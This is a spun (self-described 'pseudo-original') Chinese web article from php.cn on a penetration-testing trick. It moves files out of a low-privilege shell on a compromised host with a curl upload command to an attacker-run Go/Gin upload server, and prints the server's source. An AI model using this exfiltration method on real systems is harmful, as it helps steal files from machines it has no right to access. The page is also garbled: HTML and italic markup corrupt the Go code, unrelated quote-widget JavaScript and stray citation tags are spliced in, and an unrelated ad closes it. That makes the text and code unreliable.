在处理低权限shell回传文件的问题时,如果无法使用scp命令且无法安装sshpass,可以考虑使用curl命令进行文件传输。以下是详细的伪原创内容:
至少我们曾经在一起过。
来自:一言
var xhr = new XMLHttpRequest();
xhr.open('get', 'https://v1.hitokoto.cn/');
xhr.onreadystatechange = function () {
if (xhr.readyState === 4) {
var data = JSON.parse(xhr.responseText);
var hitokoto = document.getElementById('hitokoto');
hitokoto.innerText = data.hitokoto;
}
}
xhr.send();在当前情境下,我们面临一个低权限的shell[aru_17],而目标网站没有web服务。此外,scp命令由于权限不足(需要密码验证)无法使用[aru_28]。虽然网上建议使用sshpass来执行带密码的scp命令,但由于当前权限无法安装该工具[aru_28],因此在大表哥的指导下,我们可以利用curl命令进行文件回传[aru_21]。
条件:
方法:
使用Golang编写一个简单的文件上传后端。选择Golang是因为它可以避免安装环境等复杂操作,当然也可以使用其他编程语言[aru_62]。
点击查看后端源码
main.go文件
package main
<p>import (
"flag"
"go-upload/runserver"
)</p><p>func main() {
filedir := flag.String("f", "", "保存路径")
lport := flag.String("p", "8088", "运行端口")
flag.Parse()
if <em>filedir != "" && </em>lport != "" {
runserver.Runserver(<em>filedir, </em>lport)
} else {
flag.Usage()
}
}root.go文件
package runserver</p><p>import (
"fmt"
"github.com/gin-gonic/gin"
"net/http"
)</p><p>/** @Author: A</p><ul><li>@Date: 2021/7/6 11:32
<em>/
func Runserver(filedir string, lport string) {
r := gin.Default()
b := filedir
r.POST("/upload", func(c </em>gin.Context) {
file, err := c.FormFile("file")
//fmt.Println(file.Filename)
s := b + "/" + file.Filename
if err != nil {
c.String(500, "err")
}
// c.JSON(200, gin.H{"message": file.Header.Context})
err = c.SaveUploadedFile(file, s)
if err != nil {
c.String(http.StatusOK, "err")
}
c.String(http.StatusOK, "ok")
})
r.Run(":" + lport)
}
curl命令参数(根据环境进行调整)
curl -F "file=@文件路径" <a href="https://www.php.cn/link/d7ee21eda04855ea84c497c61337e896">https://www.php.cn/link/d7ee21eda04855ea84c497c61337e896</a><h2>上传成功会回显ok
提供的源码可以直接下载,如果不想自己编译,可以下载已编译好的Windows和Linux 64位运行程序。
蓝奏云
以上就是渗透测试|利用curl回传文件的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
广告Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
656
收藏
